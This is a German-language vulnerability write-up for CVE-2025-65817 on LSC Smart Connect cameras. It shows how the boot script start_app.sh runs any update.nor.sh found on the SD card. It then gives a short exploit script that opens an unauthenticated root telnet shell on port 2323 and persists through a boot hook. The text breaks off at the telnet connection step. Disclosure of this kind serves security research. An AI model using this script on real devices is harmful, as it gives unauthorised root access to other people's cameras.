
Hier ist die CVE-2025-65817
| Felder | Wert |
|---|---|
| Titel | Schwachstellenbericht: LSC Smart Connect Kamera |
| Datum | 2024-02-15 |
| Beschreibung | Missbrauch des SD-Karten-Update-Hooks, um Remote-Shells auf LSC Smart Connect Kameras zu starten. |
| Tags | iot, vulnerability, cve |
| Firmware | 1.14.13 |
Die gefundene Schwachstelle besteht darin, das Updatesystem in start_app.sh auszunutzen, genauer gesagt über den SD-Karten-Mount und die Datei update.nor.sh.
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"
Der Abschnitt local/sbin/start_app.sh:50–99 vertraut blind jeder Datei mit dem Namen update.nor.sh, die sich auf der SD-Karte befindet. Während des Bootvorgangs führt das Skript Folgendes aus:
update.nor.sh nach /tmp/update.nor.sh,Später im Startvorgang (local/sbin/start_app.sh:108–129) wird die kopierte Datei:
Diese Ausführung erfolgt bevor der Haupt-ipc_service startet, was bedeutet, dass das Skript in einer Umgebung mit höchsten Privilegien läuft, in der Netzwerk-Dienstprogramme, Watchdog-Funktionen und Upgrade-Helfer bereits verfügbar sind.
Der Exploit besteht darin, eine Shell zu erzeugen und einen Port über telnetd zu öffnen, das auf der Kamera vorhanden ist:
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]
Wir müssen lediglich ein .sh-Skript auf die SD-Karte schreiben und es update.nor.sh nennen.
Der Exploit, den ich gewählt habe, ist:
#!/bin/sh
telnetd -l /bin/sh -p 2323 &
echo "Telnet start by update.nor.sh" > /tmp/exploit_success
cp /mnt/update.nor.sh /mnt/config/hook-boot.sh
date > /tmp/exploit_time
Wir bestätigen, dass der Port offen ist.

Wir verbinden uns per Telnet:
